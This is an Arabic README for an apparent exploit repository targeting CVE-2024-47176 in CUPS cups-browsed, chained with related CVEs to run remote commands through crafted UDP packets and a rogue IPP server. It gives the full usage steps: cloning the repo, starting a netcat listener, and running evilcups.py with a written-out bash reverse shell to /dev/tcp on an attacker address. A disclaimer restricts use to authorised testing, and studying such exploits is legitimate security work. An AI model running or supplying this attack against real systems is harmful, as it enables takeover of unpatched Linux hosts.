
استغلال Python لـ CVE-2024-47176 يحقق تنفيذ أوامر عن بعد في CUPS cups-browsed عبر حزم UDP مصممة. يتضمن توصيل حمولة شل عكسية لاختبار الاختراق المصرح به.
لأغراض تعليمية واختبار الاختراق المأذون به فقط.
CUPS (نظام الطباعة الموحد لـ UNIX) هو نظام طباعة مفتوح المصدر يدير الطابعات المتصلة بالشبكة. يستهدف CVE-2024-47176 خدمة التي ترتبط بـ وتثق بشكل أعمى في الحزم من أي مصدر.
cups-browsedINADDR_ANY:631من خلال صنع حزمة UDP ضارة تُطلق طلب Get-Printer-Attributes الخاص بـ IPP، يمكن للمهاجم أن يتسبب في اتصال cups-browsed بخادم يتحكم به المهاجم — وعند دمجها مع الثغرات أدناه، يتم تحقيق تنفيذ أوامر تعسفية عن بُعد.
| المكون | الشرط |
|---|---|
cups-browsed | يستمع على UDP 631 (افتراضي) |
| CUPS < 2.4.11 | إصدارات غير مصححة |
| أنظمة Linux مع CUPS مكشوف | المنفذ 631 يمكن الوصول إليه من المهاجم |
| CVE | الوصف |
|---|---|
| CVE-2024-47176 | cups-browsed يثق في أي حزمة UDP على المنفذ 631 |
| CVE-2024-47076 | libcupsfilters لا يُنقّي سمات IPP |
| CVE-2024-47175 | libppd يُحقّق بيانات غير منقّاة في ملفات PPD |
| CVE-2024-47177 | cups-filters يسمح بتنفيذ الأوامر عبر PPD |
nmap (اختياري، للاستطلاع)1. استنساخ المستودع:
git clone https://github.com/gumerzzzindo/cve-2024-47176.git
cd cve-2024-47176
2. تثبيت التبعية Python المطلوبة:
pip install ippserver
3. بدء مستمع على جهازك:
nc -lvnp <PORT>
./evilcups.py <ATTACKER_IP> <TARGET_IP> "<COMMAND>"
مثال — قشرة عكسية:
./evilcups.py 10.10.10.10 10.10.11.40 "bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'"
بعد تشغيل الاستغلال، قم بتشغيل مهمة طباعة على الهدف (أو انتظر فحصًا تلقائيًا) لتنفيذ الحمولة.
هذا المستودع مخصص لأغراض تعليمية فقط وأبحاث أمنية مأذون بها. استخدام هذه الأداة ضد أنظمة لا تملكها أو ليس لديك إذن كتابي صريح لاختبارها هو غير قانوني وغير أخلاقي.